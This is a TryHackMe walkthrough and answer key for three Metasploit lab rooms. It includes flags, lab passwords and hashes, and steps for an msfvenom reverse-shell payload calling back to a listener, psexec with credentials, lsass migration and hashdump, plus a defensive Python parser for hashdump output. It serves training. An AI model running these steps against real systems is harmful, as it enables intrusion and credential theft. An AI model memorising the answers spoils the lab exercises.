TryHackMe — Jr Penetration Tester — Metasploit
Room 1 - Metasploit: Introduction
Task 1 Introduction to Metasploit
Read only task!!
Task 2 Main Components of Metasploit
Answer the questions below
Q 1. What is the name of the code taking advantage of a flaw on the target system?
Ans. Exploit
Q 2. What is the name of the code that runs on the target system to achieve the attacker’s goal?
Ans. Payload
Q 3. What are self-contained payloads called?
Ans. Singles
Q 4. Is “windows/x64/pingback_reverse_tcp” among singles or staged payload?
Ans. Singles
Task 3 Msfconsole
Answer the questions below
Q 1. How would you search for a module related to Apache?
Ans. search apache
Q 2. Who provided the auxiliary/scanner/ssh/ssh_login module?
Ans. todb
Task 4 Working with modules
Answer the questions below
Q 1. How would you set the LPORT value to 6666?
Ans. set LPORT 6666
Q 2. How would you set the global value for RHOSTS to 10.10.19.23 ?
Ans. setg RHOSTS 10.10.19.23
Q 3. What command would you use to clear a set payload?
Ans. unset PAYLOAD
Q 4. What command do you use to proceed with the exploitation phase?
Ans. exploit
Room 2 - Metasploit: Exploitation
Task 1 Introduction
Read Only Task!!
Task 2 Scanning
Answer the questions below
Q 1. How many ports are open on the target system?
Ans. 5
Q 2. Using the relevant scanner, what NetBIOS name can you see?
Ans. ACME IT SUPPORT
Q 3. What is running on port 8000?
Ans. webfs/1.21
Q 4. What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.
Ans. leo1234
Task 3 The Metasploit Database
Read Only Task!!
Task 4 Vulnerability Scanning
Q 1. Who wrote the module that allows us to check SMTP servers for open relay?
Ans. Campbell Murray
Task 5 Exploitation
Q 1. What is the content of the flag.txt file?
Ans. THM-5455554845
Enumeration: Run Nmap to check for open services.
To find open vulnerabilities: nmap -p445 --script vuln <target>
Search for a payload and try a reverse shell.
After selecting the payload, set RHOST to the target IP and run exploit; we got Windows CMD access.
After digging through the directories we found flag.txt.
Q2. What is the NTLM hash of the password of the user “pirate”?
Ans. 8ce9a3ebd1647fcc5e04025019f4b875
Use search hashdump to find the module, then
run post/windows/gather/hashdump
Task 6 Msfvenom
Q 1. What is the other user’s password hash?
Ans. 6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
Steps: Create a meterpreter payload in .elf format
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.78.250 LPORT=4444 -f elf > rev_shell.elf
Now run an HTTP server using python http.server to transfer the payload to the target machine.
We will use the multi handler to receive the incoming connection. The module is loaded with the use exploit/multi/handler command.
Once everything is set, we run the handler and wait for the incoming connection.
Now run the uploaded reverse shell payload on the target machine to get a meterpreter session.
To get the password hash, run post/linux/gather/hashdump
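As an added example (not part of the original walkthrough or of Metasploit itself), here is a small Python parser for the two hashdump output formats read in Task 5 and Task 6: the user:rid:lm:nt::: lines printed by post/windows/gather/hashdump and the shadow-style user:$id$salt$hash lines printed by post/linux/gather/hashdump. It also runs the checks a defender would apply when reviewing such a dump; the sample lines are constructed and the function names are my own.

```python
import re
# Well-known constants: LM and NT hashes of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
WINDOWS_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$")

# Constructed samples (not from any real host) in the shape the two hashdump modules print.
WINDOWS_SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1002:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
"""
LINUX_SAMPLE = """\
root:$6$c0nstructd$FakeSha512cryptBodyNotFromAnyHost
svc:$1$oldsalt$AlsoMadeUpMd5cryptBody
lock:!
"""

def parse_windows_hashdump(text):
    # One dict per user:rid:lm:nt::: line; lines that do not match are skipped.
    matches = (WINDOWS_LINE.match(line.strip()) for line in text.splitlines())
    return [dict(zip(("user", "rid", "lm", "nt"), m.groups())) for m in matches if m]

def parse_linux_hashdump(text):
    # user:$id$[params$]salt$hash (modular crypt format); '!' or '*' means locked.
    rows = []
    for line in text.splitlines():
        user, sep, field = line.strip().partition(":")
        if not sep: continue
        parts = field.split("$")  # ['', id, (params...), salt, hash] for real hashes
        if len(parts) < 4:
            rows.append({"user": user, "algo": None, "salt": None, "hash": field})
        else:
            rows.append({"user": user, "algo": CRYPT_IDS.get(parts[1], parts[1]),
                         "salt": parts[-2], "hash": parts[-1]})
    return rows

def audit_hashdump(win_text, lin_text):
    # (user, finding) pairs a defender would act on after reviewing a dump.
    findings = []
    for r in parse_windows_hashdump(win_text):
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "empty password"))
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "LM hash stored (NoLMHash not enforced)"))
    for r in parse_linux_hashdump(lin_text):
        if r["algo"] == "md5crypt":
            findings.append((r["user"], "weak md5crypt hash"))
    return findings
```

Feeding a real dump in, the findings list is what you would hand to the system owner: empty passwords, hosts still storing LM hashes, and accounts still on md5crypt.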
Task 7 Summary
Read Only Task!!
Room 3 - Metasploit: Meterpreter
Task 1 Introduction to Meterpreter
Read only Task!!
Task 2 Meterpreter Flavors
Read only Task!!
Task 3 Meterpreter Commands
Read only Task!!
Task 4 Post-Exploitation with Meterpreter
Read only Task!!
Task 5 Post-Exploitation Challenge
Statement: The questions below will help you have a better understanding of how Meterpreter can be used in post-exploitation.
You can use the credentials below to simulate an initial compromise over SMB (Server Message Block) (using exploit/windows/smb/psexec)
Username: ballen
Password: Password1
Solution:
Use exploit/windows/smb/psexec in Metasploit.
Set RHOST <Target_Machine_IP>, SMBUser and SMBPass (make sure the payload is set to windows/meterpreter/reverse_tcp and the listener is running in the background).
After exploiting we will get a meterpreter session.
Answer the questions below
Q 1 . What is the computer name?
Ans. ACME-TEST
Q 2. What is the target domain?
Ans. FLASH
Q 3. What is the name of the share likely created by the user?
Ans. speedster
Background the meterpreter session using the command background
Use the module post/windows/gather/enum_shares
Set SESSION to the id of the backgrounded session
Then run the module
Q 4. What is the NTLM hash of the jchambers user?
Ans. 69596c7aa1e8daee17f8e78870e25a5c
Migrate to lsass.exe (Local Security Authority Subsystem Service)
Q 5. What is the cleartext password of the jchambers user?
Ans. Trustno1
Q 6. Where is the “secrets.txt” file located?
Ans. c:\Program Files (x86)\Windows Multimedia Platform
Q 7. What is the Twitter password revealed in the “secrets.txt” file?
Ans. KDSvbsw3849!
Q 8. Where is the “realsecret.txt” file located?
Ans. c:\inetpub\wwwroot\
Q 9. What is the real secret?
Ans. The Flash is the fastest man alive